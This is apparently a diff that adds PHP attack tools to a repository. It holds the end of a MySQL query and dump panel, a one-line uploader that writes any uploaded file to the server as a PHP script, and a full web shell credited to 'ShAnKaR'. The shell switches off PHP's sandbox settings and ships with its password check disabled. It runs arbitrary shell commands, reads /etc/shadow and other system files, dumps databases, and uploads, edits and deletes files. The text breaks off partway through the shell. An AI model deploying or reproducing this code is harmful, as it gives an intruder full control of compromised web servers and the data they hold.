+echo $dump_file;
+}else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+}
+}
+}
+break;
+}
+case 'query' :
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<table>
+<td>
+<table align=left>
+<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
+<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
+</table>
+</td>
+<td>
+<table>
+<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
+<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<tr><td><input type=submit name='action' value='dump'></td></tr>
+<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
+</table>
+</td>
+</table>
+<input name='page' value='mysql' type=hidden>
+<input name='action' value='query' type=submit>
+</form>
+<hr>
+<?
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$result=@mysql_query($query,$mysql_link);
+if(!($result))echo(mysql_error());
+else
+{
+echo("<table valign=top align=left>\n<tr>");
+for($i=0;$i<mysql_num_fields($result);$i++)
+echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
+echo("\n</tr>\n");
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+echo('<tr valign=top align=left>');
+for($j=0;$j<mysql_num_fields($result);$j++)
+{
+echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
+}
+echo("</tr>\n");
+}
+echo("</table>\n");
+}
+mysql_close($mysql_link);
+}
+break;
+}
+}
+break;
+}
+}
+?>

php/Uploader.php

@@ -0,0 +1,9 @@
+<FORM ENCTYPE="multipart/form-data" ACTION="uploader.php" METHOD="POST">
+<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
+Send this file: <INPUT NAME="userfile" TYPE="file">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<?
+move_uploaded_file($userfile, "entrika.php"); 
+?>
+

php/Web-shell (c)ShAnKaR.php

@@ -0,0 +1,644 @@
+<?php
+
+                                       ##    ##  #
+                                         ##     #  ####
+                                           ## ##  ##  ##
+                                       ###  ###  ##    #
+                                     ### ##     ##     ##
+                                   ##    ###  ##       ##
+                                          #     #     ##
+                                        ###    #     ##
+                                      ### #   ##    ##
+                                      #   ##  ##   ##
+                                           #   #####
+                                   #       ##   ###
+                                  ##     ###     #
+                                   #######
+                                    #####
+
+//error_reporting(0);
+@ini_restore("safe_mode"); 
+@ini_restore("open_basedir"); 
+if(get_magic_quotes_gpc()){
+while(list($key,$val)=each($_POST)){
+$_POST[$key]=stripslashes($val);}}
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$name='1'; 
+$pass='c8d3a760ebab631565f8509d84b3b3f1';
+if(false){#esli nado pishem 'true'
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass){
+header('WWW-Authenticate: Basic realm="Auth"');header('HTTP/1.0 401 Unauthorized');
+exit;}}
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+function font($color,$text,$size=4){return("<font color=$color size=$size >$text</font>");}
+function w($a){return str_repeat("&nbsp;",$a);}
+function b($b){return "<b>$b</b>";}
+function e($e){switch($e){
+case 0:return('no such file');
+case 1:return('no such dirictory');
+case 2:return('permission denied');
+case 3:return('is not dirictory');
+case 4:return('is a dirictory');
+}}
+function test_file($filename){
+return(file_exists($filename)?(is_readable($filename)?false:font('red',e(2))):font('red',e(0)));}
+if(isset($_POST['downl']) && !empty($_POST['downf'])){
+if(!preg_match('/^\//',$_POST['downf'])){
+$_POST['downf']=$_POST['th'].'/'.$_POST['downf'];}
+if(!test_file($_POST['downf'])){
+if(!is_dir($_POST['downf'])){
+$fd=fopen($_POST['downf'], "rb");
+$nam=preg_replace('/.+\//','',$_POST['downf']);
+header("Content-Type: application/octet-stream; name=\"".$nam."\"");
+header("Content-Length: ".filesize($_POST['downf']));
+header("Content-disposition: attachment; filename=\"".$nam."\"");
+while(!feof($fd)){
+$buffer=fgets($fd,4096);
+echo $buffer;
+}
+fclose ($fd);
+exit;
+}
+else $error=font('red',e(4));
+}
+else $error=test_file($_POST['downf']);}
+if(isset($_POST['sql']) && !isset($_POST['exitsql'])){
+$text="<body bgcolor=#C2DDFF>
+<b>Mysql@server:user:pass:db</b>
+<form method='POST'>
+";
+$a=array('server','user','password','db');$i=-1;
+while($i++<3){
+$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:'')."'>\n";}
+$text.="<input type='submit' name='sql' value='Connect'>
+<input type='submit' name='exitsql' value='Exit'>";
+$text="\n<body bgcolor=#C2DDFF>
+<b>Mysql@server:user:pass:db</b>
+<form method='POST'>\n";
+$a=array('srv','user','pass','db');$i=-1;
+while($i++<3){
+$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:(($i==0)?'localhost':null))."'>\n";}
+$text.="<input type='submit' name='sql' value='Connect'><input type='submit' name='exitsql' value='Exit'>\n";
+if(isset($_POST['sql'])){
+if(isset($_POST['user']))$user=$_POST['user'];
+if(isset($_POST['pass']))$password=$_POST['pass'];
+if(isset($_POST['srv'])){
+$server=$_POST['srv'];
+$connect=mysql_connect($server,$user,$password) or die($text."</form>not connect");}
+else{die($text."</form>");}
+if(!empty($_POST['db'])){mysql_select_db($_POST['db'])or die("Could not select db<br>");}
+function write($data){
+switch($_POST['save']){
+case 0:
+global $dump;
+$dump.=$data;
+break;
+case 1:
+global $fp;
+switch($_POST['compr']){
+case 0:
+fwrite($fp,$data);
+break;
+case 1:
+gzwrite($fp, $data);
+break;
+case 2:
+bzwrite($fp,$data);
+break;}
+break;}}
+function sqlh(){
+global $dump,$server;
+write("#\n#Server : ".getenv('SERVER_NAME')."
+#DB_Host : ".$server."
+#DB : ".$_POST['db']."
+#Table : ".$_POST['table_sel']."\n#\n\n");}
+function sql(){
+global $dump,$connect;
+$row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `".$_POST['table_sel']."`",$connect));
+write("DROP TABLE IF EXISTS `".$_POST['table_sel']."`;\n".$row[1].";\n\n");}
+function sql1(){
+global $connect;
+$result=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect);
+function test($aaa){
+$d=array();
+while (list($key,$val)=each($aaa)){$d[$key]=addslashes($val);}
+return($d);}
+while ($line=mysql_fetch_assoc($result)) {
+((!isset($key))?($key=implode('`, `',array_keys($line))):null);
+$ddd=test(array_values($line));
+$val=implode('\', \'',$ddd);
+write("INSERT INTO `".$_POST['table_sel']."`(`".$key."`) VALUES ('".$val."');\n");}
+mysql_free_result($result);}
+function head($tmpfname,$name){
+header("Content-Type: application/octet-stream; name=\"$name\"");
+header("Content-Length: ".filesize($tmpfname)."");
+header("Content-disposition: attachment; filename=\"$name\"");
+$fd=fopen($tmpfname, "r");
+while(!feof($fd)){
+echo fgets($fd, 4096);}
+fclose($fd);
+unlink($tmpfname);
+exit;}
+if(isset($_POST['back']) && isset($_POST['table_sel'])){
+$dump='';
+if($_POST['save']==1){
+$tmpfname=tempnam($_POST['save_p'], "FOO");
+switch($_POST['compr']){
+case 0:
+$fp=fopen($tmpfname,"w");
+break;
+case 1:
+$fp=gzopen($tmpfname, "w9");
+break;
+case 2:
+$fp=bzopen($tmpfname, "w");
+break;}}
+switch($_POST['as']){
+case 0:
+switch($_POST['as_sql']){
+case 0:
+sqlh();
+sql();
+break;
+case 1:
+sqlh();
+sql();
+sql1();
+break;
+case 2:
+sqlh();
+sql1();
+break;}
+if($_POST['save']==1){
+switch($_POST['compr']){
+case 0:
+$n='.txt';
+fclose($fp);
+break;
+case 1:
+$n='.gz';
+gzclose($fp);
+break;
+case 2:
+$n='.bz2';
+bzclose($fp);
+break;}
+head($tmpfname,$_POST['table_sel'].$n);}
+break;
+case 1:
+$res=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect); 
+if(mysql_num_rows($res) > 0) {
+while($row = mysql_fetch_assoc($res)) { 
+$values = array_values($row); 
+foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+$values = implode($_POST['cvs_term'], $values); 
+write($values);}}
+break;}}
+echo "$text\n<table height=200 width=100%><tr><td bgcolor=green width=10%>";
+$db_list=mysql_list_dbs($connect);
+echo "<select name='db' multiple size=30>\n";
+while($row=mysql_fetch_object($db_list)){
+$db1=$row->Database;
+echo "<option value='$db1' ".(($db1===$_POST['db'])?'selected':'').">$db1</option>\n";}
+echo "</select></td><td bgcolor=#CBC3B6>\n";
+if(!empty($_POST['db'])){
+$tb_list=mysql_list_tables($_POST['db']);
+echo "<select name='table_sel' multiple size=30>";
+for($i=0;$i<mysql_num_rows($tb_list);$i++){
+$n=mysql_fetch_array(mysql_query('select count(*) from '.mysql_tablename($tb_list,$i)));
+echo "<option value='".mysql_tablename($tb_list, $i)."'".($tr=((isset($_POST['table_sel']) && $_POST['table_sel']===mysql_tablename($tb_list, $i))?'selected':'')).">".mysql_tablename($tb_list, $i).'('.$n[0].")</option>";}
+echo "</select></td><td width=100%>
+<table  width=100% height=100% bgcolor='#E3FFF2'><tr><td height=20 bgcolor=#dfdfdf width=100%><nobr>\n";
+if(isset($_POST['table_sel'])){
+$c=array('Browse','SQL','Insert','Export');$i=-1;
+while($i++<3){echo "<input type=radio Name='go' value='".($i)."'>".$c[$i];}}
+echo "&nbsp;&nbsp;<b>".((isset($_POST['table_sel']))?$_POST['table_sel']:null)."</b></nobr></td></tr><tr width=100%><td width=100%>\n";}
+if(isset($_POST['push']) && isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']))$_POST['go']=0;
+elseif(isset($_POST['push']))$_POST['go']=1;
+if(isset($_POST['back']))$_POST['go']=3;
+if(isset($_POST['brow']))$_POST['go']=0;
+if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=4;
+if(isset($_POST['ed_save']))$_POST['go']=5;
+if(isset($_POST['editr']) && !isset($_POST['edit']))$_POST['go']=0;
+if(isset($_POST['go'])){switch($_POST['go']){
+case 0:
+if(isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']) && isset($_POST['push'])){
+$n=mysql_fetch_array(mysql_query(preg_replace('/^\s*select\s+.+\s+from\s+/i','select count(*) from',$_POST['querysql'])));
+$result=mysql_query($_POST['querysql'],$connect);}
+else{$n=mysql_fetch_array(mysql_query('select count(*) from '.$_POST['table_sel']));$sort='';
+if(!empty($_POST['sort']))$sort='ORDER BY `'.trim($_POST['sort']).'` ASC ';$co='0,20';
+if(isset($_POST['br_st']) && isset($_POST['br_en'])){
+$co=$_POST['br_en'].','.$_POST['br_st'];}
+$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` $sort limit $co",$connect);}
+for($i=0;$i<mysql_num_fields($result);$i++){
+if(ereg('primary_key',mysql_field_flags($result, $i)))
+$prim=mysql_field_name($result, $i);}
+$up_e='';
+echo "<div style='width:100%;height:450px;overflow:auto;'><table border=1>\n";
+while($line=mysql_fetch_array($result,MYSQL_ASSOC)){echo "<tr bgcolor='#C1D2C5'>\n";
+if(!isset($lk)){
+echo "<td><b>EDIT</b></td>";
+foreach(array_keys($line) as $lk){print((isset($prim) && $lk===$prim)?"<td><u><b>$lk</b></u></td>":"<td>$lk</td>\n");}}
+if(!isset($prim)){
+while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";}
+$up_e=substr($up_e,0,-5);}
+else{while(list($key,$val)=each($line)){
+if($key===$prim){$up_e.="`$key`='".addslashes($val)."'";}}}
+$up_e=urlencode($up_e);
+echo "</tr><tr><td><input type=radio name=edit value='$up_e'></td>\n";
+$up_e='';
+foreach($line as $col_value){echo "<td>".((strlen($col_value)>40)?'<textarea cols=40 rows=7>'.htmlspecialchars($col_value).'</textarea>':htmlspecialchars($col_value))."</td>\n";}
+echo "</tr>\n";}
+echo "</table></div><input type=submit name='brow' value='Browse'><b>Sort by
+<input type=text name=sort size=10 value='".((isset($_POST['sort']))?$_POST['sort']:'')."'>
+Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:$n[0])." name='br_st'>row(s) starting from<input type=text size=5 value=".((isset($_POST['br_en']))?$_POST['br_en']:'0')." name='br_en'></b>
+<input type=submit name=editr value=Edit>";
+mysql_free_result($result);
+break;
+case 1:
+echo "<input type=submit name=push value=Run><br>
+<textarea cols=70% rows=8 name='querysql'>\n".((!empty($_POST['querysql']))?htmlspecialchars($_POST['querysql'],ENT_QUOTES):((isset($_POST['table_sel']))?"SELECT * FROM `".$_POST['table_sel']."` WHERE 1":null))."</textarea><br><br>\n";
+if(!empty($_POST['querysql'])){
+$result = mysql_query($_POST['querysql'],$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
+echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";}
+break;
+case 2:
+echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";
+$fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect);
+for($i=0;$i<mysql_num_fields($fields);$i++){
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($fields,$i).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($fields, $i).'('.mysql_field_len($fields, $i).")</b></td><td>".((mysql_field_len($fields, $i)<40)?"<input type='text' name='ed_key:".mysql_field_name($fields,$i)."' value='' size=40>":"<textarea name='ed_key:".mysql_field_name($fields,$i)."' cols=31 rows=7></textarea>")."</td></tr>\n";}
+echo "</table></div><input type=hidden name=insert value=1><input type=submit name=ed_save value=Insert>";
+break;
+case 3:
+if(!isset($_POST['back']))echo '<table height=250  align="center"><TR><TD>
+<table height=100%>
+<tr><td bgcolor="#A8B8F1" width="100" height="20"><b>&nbsp;&nbsp;Export as</b></td></tr>
+<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="0" checked><b>&nbsp;&nbsp;SQL</b></td></tr>
+<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="1"><b>&nbsp;&nbsp;CSV</b></td></tr>
+<tr><td height=100%></td></tr>
+</table></TD><td>
+<table width="140" height=100%>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;SQL</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="0" ><b>Only structure</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="1" checked><b>All</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="2"><b>Only data</b></TD></TR>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>CSV</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><b>Terminated&nbsp;</b><input size=2 type=text Name="cvs_term" value=":"></TD></TR>
+<tr><td height=100%></tb></tr>
+</table>
+</td><td>
+<table height=100%>
+<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="0" checked><b>&nbsp;View</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="1"><b>&nbsp;Download</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="130" height="40"><b>&nbsp;Temp path</b><br><input type=text Name="save_p" value="/tmp"></td></tr>
+<tr><td height=100%></td></tr>
+</table></td><td>
+<table width="120" height=100%>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;Compression</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="0" checked><b>None</b></TD></TR>'.
+((@function_exists('gzencode'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="1" ><b>Gzip</b></TD></TR>':'').
+((@function_exists('bzcompress'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="2"><b>Bzip</b></TD></TR>
+<tr><td height=100%></td></tr>':'').'</table></td></TR>
+<tr><td><input type=submit value=backup name=back></td></tr>
+</table>';
+if(isset($_POST['back']) && isset($_POST['table_sel'])){
+if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump)."</textarea>";}}
+break;
+case 4:
+if(isset($_POST['edit'])){
+$up_e=$_POST['edit'];
+echo "<input type=hidden name=edit value='$up_e'>";
+$up_e=urldecode($_POST['edit']);
+echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";$fi=0;
+$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect);
+while($line=mysql_fetch_array($result,MYSQL_ASSOC)){
+foreach($line as $key=>$col_value) {
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($result,$fi).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")</b></td><td>".((mysql_field_len($result,$fi)<40)?"<input type='text' name='ed_key:".mysql_field_name($result,$fi)."' value='".htmlspecialchars($col_value,ENT_QUOTES)."' size=40>":"<textarea name='ed_key:".mysql_field_name($result,$fi)."' cols=31 rows=7>".htmlspecialchars($col_value,ENT_QUOTES)."</textarea>")."</td></tr>\n";
+$fi++;}}
+echo "</table></div><input type=submit name=ed_save value=Save>";}
+break;
+case 5:
+$ted='';
+$_POST2=$_POST;# X.Z. zachem, xernya kakaeto :)
+while(list($key1,$val1)=each($_POST2)){
+if(preg_match('/ed_key:(.+)/',$key1,$m))
+{$ted.="`".$m[1]."`= '".addslashes($val1)."', ";}}
+$ted=substr($ted,0,-2);
+$query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 ");
+echo "<div style='background-color:white;'>".htmlspecialchars($query,ENT_QUOTES)."</div><br>";
+$result = mysql_query($query,$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
+echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";
+break;}}
+echo "</td></tr></table></td></tr></table><input type=hidden name=sql>\n";}
+else echo $text;
+echo "</form></body>";exit;}
+echo "<html><body bgcolor=white><center><table bgcolor=orange height=10 border=1><tr><td><nobr>".font('blue',@php_uname())."</nobr></td></tr></table><table bgcolor=orange height=10 border=1><tr><nobr><td>".font('blue','PHP:'.@phpversion())."</nobr></td><td><nobr>".font('blue',date('H:i:s l d F Y'))."</nobr></td><td><nobr>".font('blue',getenv('SERVER_ADDR'))."</nobr></td><td><nobr>".font('blue',getenv('REMOTE_ADDR'))."</nobr></td></tr></table><br></center>\n";
+if(!test_file('/etc/shadow'))echo font('red',b('shadow readable<br>'));
+if(!test_file('/etc/shadow-'))echo font('red',b('shadow- readable<br>'));
+if(!test_file('/etc/master.passwd'))echo font('red',b('master.passwd readable<br>'));
+if(!empty($_POST['th']))@chdir($_POST['th']);
+echo ((is_writable('/tmp/'))?font('green',"TEMP USE".w(1)):font('red',"TEMP NO USE"));
+#UP
+if(isset($_POST['up']))@chdir('../');
+#CD
+if(isset($_POST['c']) && $_POST['cd']!=''){
+if(!test_file($_POST['cd'])){
+if(is_dir($_POST['cd'])){
+@chdir($_POST['cd']);
+}
+else $error=font('red',e(3));
+}
+else $error=test_file($_POST['cd']);}
+echo w(3)."<input type=text size=60 value=".getcwd().">";
+echo font('blue','USER : '.get_current_user());
+if(file_exists("/"))
+echo((is_readable("/"))?w(2).font('green','DIR / - IS READ'):w(2).font('red','DIR / - IS NO READ'));
+if(file_exists("C:/"))
+echo((is_readable("C:/"))?w(2).font('green','DIR C:/ - IS READ'):w(2).font('red','DIR C:/ - IS NO READ'));
+if(ini_get('safe_mode'))echo w(2).font('red','SAFE MODE');
+echo "<br>";
+?>
+<hr>
+<form method=POST name=main>
+<input type="submit" value="^" name="up">
+<input type=text name=cd>
+<input type=submit value=cd name=c>
+<input type=text name=open>
+<input type=submit value=open name=op>
+<input type=text name=new>
+<input type=submit name=cr value="new file">
+<input type=text name=exec>
+<input type=submit name=exe value=exec>
+<input type=submit name=info value=phpinfo>
+<br>
+<?php
+$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/etc/hosts','/proc/version','/proc/cpuinfo','/proc/meminfo','/etc/httpd/conf/httpd.conf','/usr/local/apache/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/etc/syslog.conf');
+echo '<select name=passwd>';
+foreach($ar_file as $ar_l){
+if(!test_file($ar_l))echo "<option value='$ar_l'>$ar_l</option>\n";}
+echo '</select><input type=submit name=passw value="read file">';
+?>
+<input type=submit name=menu value=upload>
+<input type=text name=downf>
+<input type=submit name=downl value=download>
+<input type=text name="test">
+<input type=submit name=tes value="perms">
+<input type="submit" name="sql" value="mysql">
+<input type="submit" name="eval" value="eval">
+<br>
+<input type=text name=strin>
+<input type=text name=remot>
+<input type=submit name=copy value=copy>
+<input type="text" name="renold" >
+<input type="text" name="rennew" >
+<input type="submit" name="rename" value="rename">
+<input type=text name=rm >
+<input type=submit name=del value=del>
+<br>
+<input type=reset value=RESET>
+<input type="text" name="mkdir">
+<input type="submit" name="mk" value="mkdir">
+<input type="text" name="rmdir">
+<input type="submit" name="rmd" value="rmdir">
+<input type="text" name="ch_mod">
+<?php
+for($bch=1;$bch<=3;$bch++){echo"<select name=ch_p$bch>\n";
+for($ach=7;$ach>=0;$ach--){echo"<OPTION value=$ach>$ach</OPTION>";}
+echo"</select>";}
+?>
+<input type="submit" name="ch_chmod" value="chmod">
+<input type=submit name=find value='find writeable'>
+<br>
+<hr>
+<?php
+#FIND WRITEABLE##############
+if(isset($_POST['find'])){
+echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" checked>Only writeable:<input type=checkbox name="onw" checked><input type=submit name=fww value="Find it">');}
+if(isset($_POST['fww']) && !empty($_POST['fpath'])){
+echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" '.(isset($_POST['dy'])?'checked':null).'>Only writeable:<input type=checkbox name="onw" '.(isset($_POST['onw'])?'checked':null).'><input type=submit name=fww value="Find it"><hr>');
+$arrfw=array($_POST['fpath']);
+$ife=0;
+while(++$ife<=count($arrfw)){
+$pathfw=$arrfw[$ife-1];
+if(is_readable($pathfw)){
+if($hfw=opendir($pathfw)){
+while(false!==($ffw=readdir($hfw))){
+$ffw=$pathfw.$ffw;
+if(!preg_match('/\/\.+$/',$ffw)){
+if(is_dir($ffw)){array_push($arrfw,$ffw.'/');}
+print(is_dir($ffw)?(is_writeable($ffw)?font('red',"$ffw/<br>",3) :(isset($_POST['onw'])?null:"$ffw/<br>")):(!isset($_POST['dy'])?(is_writeable($ffw)?font('green',"$ffw<br> ",3):(isset($_POST['onw'])?null:"$ffw<br>")):null));}}
+closedir($hfw);}}}}
+
+
+if(isset($_POST['eval'])){
+echo "<textarea cols=70 rows=7 name='ev'></textarea>\n";
+
+
+
+
+
+echo "";
+}
+############################################################################
+#RENAME
+if(isset($_POST['rename']) && $_POST['renold']<>'' && $_POST['rennew']<>''){
+if(file_exists($_POST['renold'])){
+@rename($_POST['renold'],$_POST['rennew']);
+}
+else $error=font('red',e(0));
+}
+#
+
+#RMDIR
+if(isset($_POST['rmd']) && isset($_POST['rmdir'])){
+if(file_exists($_POST['rmdir'])){
+if(is_dir($_POST['rmdir'])){
+if(@rmdir($_POST['rmdir'])) echo font('green',"dir ".b($_POST['rmdir'])." delet"); 
+else $error=font('red','dir not deleted');
+}
+else $error=font('red',e(3));
+}
+else $error=font('red',e(0));
+}
+#
+#CHMOD
+if(isset($_POST['ch_chmod']) && isset($_POST['ch_mod'])){
+if(file_exists($_POST['ch_mod'])){
+@chmod($_POST['ch_mod'],octdec($_POST['ch_p1'].$_POST['ch_p2'].$_POST['ch_p3']));}
+else $error=font('red',e(0));}
+#
+#DELETE
+if(isset($_POST['del']) && $_POST['rm']!=''){
+if(file_exists($_POST['rm'])){
+if(!is_dir($_POST['rm'])){
+@unlink($_POST['rm']);
+}
+else echo "<br>".font('red',e(4)."<br>");
+}
+else echo "<br>".font('red',e(0)."<br>");
+}
+#
+#EXEC
+if(!empty($_POST['exe'])){
+if(@exec($_POST['exec'],$ar)){
+echo "<textarea cols=70 rows=15>";
+foreach($ar as $line){
+echo $line."\n";
+}
+echo "</textarea>";}}
+#
+#OPEN FILE
+if(isset($_POST['op']) && $_POST['open']!=''){
+if(!test_file($_POST['open'])){
+if(!is_dir($_POST['open'])){
+$fil=file($_POST['open']);
+echo "<textarea cols=100 rows=20 name=edit>";
+foreach($fil as $vv){
+echo htmlspecialchars($vv);
+}
+echo "</textarea><br>".font('green',"FILE : ".$_POST['open'],3);
+if(is_writable($_POST['open'])==1){
+echo w(2).font('green','ACCESS GRANTED');
+echo "<input type=submit name=save value=save><input type=hidden value=".$_POST['open']." name=sv>";
+}}
+else $error=font('red',e(2));
+}
+else $error=test_file($_POST['open']);
+}
+if(isset($_POST['save'])){
+$fr=fopen($_POST['sv'],"w");
+$out=$_POST['edit'];
+fputs($fr,$out);
+fclose($fr);
+}
+#
+#CREATE FILE
+if(isset($_POST['cr']) && $_POST['new']!=''){
+if(is_writable(dirname($_POST['new']))){
+echo font('green',"Create new file : ".$_POST['new'],3)."<br><textarea name=newf cols=100 rows=20></textarea>
+<input type=submit name=cre value=create>
+<input type=hidden value=".$_POST['new']."  name=nf>";
+}
+else echo "<br>".font('red',e(2)."<br>");
+}
+if(isset($_POST['cre'])){
+$ee=fopen($_POST['nf'],'w+');
+$out=$_POST['newf'];
+fputs($ee,$out);
+fclose($ee);
+}
+#
+#MKDIR
+if(isset($_POST['mk']) && $_POST['mkdir']!=''){
+if(is_writeable('./')){
+@mkdir($_POST['mkdir']);
+echo font('green',"dir ".b($_POST['mkdir'])." create"); 
+}
+else echo font('red',e(2));
+}
+#
+echo "<input type=hidden name=th value=".getcwd()."></form>";
+#UPLOAD FILE
+if(isset($_POST['menu']) || isset($_POST['qq'])){
+echo "
+<form enctype=multipart/form-data  method=post>
+Save as :<input type=text name=name>File :<input name=userfile type=file>
+<input type=submit value=Send name=go_up>
+<input type=hidden name=qq>
+<input type=hidden name=th value=".getcwd()."></form>";
+if(isset($_POST['go_up'])){
+if(isset($_POST['name']) && $_POST['name']==''){
+$_POST['name']=$_FILES['userfile']['name'];}
+if(!preg_match('/^\//',$_POST['name'])){
+$_POST['name']=$_POST['th'].'/'.$_POST['name'];}
+if(is_uploaded_file($_FILES['userfile']['tmp_name'])){
+@copy($_FILES['userfile']['tmp_name'],$_POST['name']);}
+else echo "<br>".font('red',"Permisions denied");}}
+#
+#TEST PERM
+if(isset($_POST['tes']) && $_POST['test']!=''){
+$j=$_POST['test'];
+if(file_exists($j)){
+$w='';
+if(is_writeable($j)){
+$w=w(1).'WRITE'.w(1);
+}
+if(is_readable($j)){
+$w=$w.w(1).'READ'.w(1);
+}
+echo font('green',$w.sprintf("%o", (fileperms($_POST['test'])) & 0777));
+}
+else echo font('red',$e(0));
+}
+#
+#COPY
+if(isset($_POST['copy'])&& $_POST['strin']!='' && $_POST['remot']!=''){
+if(file_exists(dirname($_POST['remot']))){
+if(file_exists($_POST['strin'])){
+if(is_writable(dirname($_POST['remot']))){
+if(is_readable($_POST['strin'])){
+@copy($_POST['strin'],$_POST['remot']);
+}
+else echo font('red',"no read string file");
+}
+else echo font('red',"no write dest directory");
+}
+else echo font('red',"no such file");
+}
+else echo font('red',"no such dest dir");
+}
+#
+#CHECK DISK
+if(isset($_POST['free']) && $_POST['dirfree']!=''){
+if(file_exists($_POST['dirfree'])){
+$fre=@disk_free_space($_POST['dirfree'])/1048576;
+echo font('green',"Free space in ".b($_POST['dirfree'])." : ".$fre." Mb");
+$fre1=@disk_total_space($_POST['dirfree'])/1048576;
+echo "<br>".font('green',"Full size in ".b($_POST['dirfree'])." : ".$fre1." Mb");
+}
+else echo font('red',"No such disk");
+}
+#
+(isset($_POST['info']))?phpinfo():null;
+#
+#PASSWD
+if(!empty($_POST['passwd']) && isset($_POST['passw'])){
+echo "<center>".font('blue',"file : ".$_POST['passwd'],6)."</center><br><textarea cols=100 rows=15>\n";
+foreach(@file($_POST['passwd']) as $fed)echo $fed;
+echo "</textarea><br>\n";}
+#
+if(isset($error))echo $error;?>
+<hr><?php
+##################################################################################
+if(is_readable(getcwd())){
+if($h=opendir(getcwd())){
+$arr=array();
+while(false!==($f=readdir($h))){array_push ($arr,$f);}
+closedir($h);}}
+else die("<center>".b(font('red','FUNCTION LIST PERMISSION DENIED',6))."</center>");
+sort($arr);
+echo '<table width=800 bgcolor=#DFD6C8 cellspacing=0 cellpadding=0 border=1>';
+foreach($arr as $f){
+$l=@lstat($f);
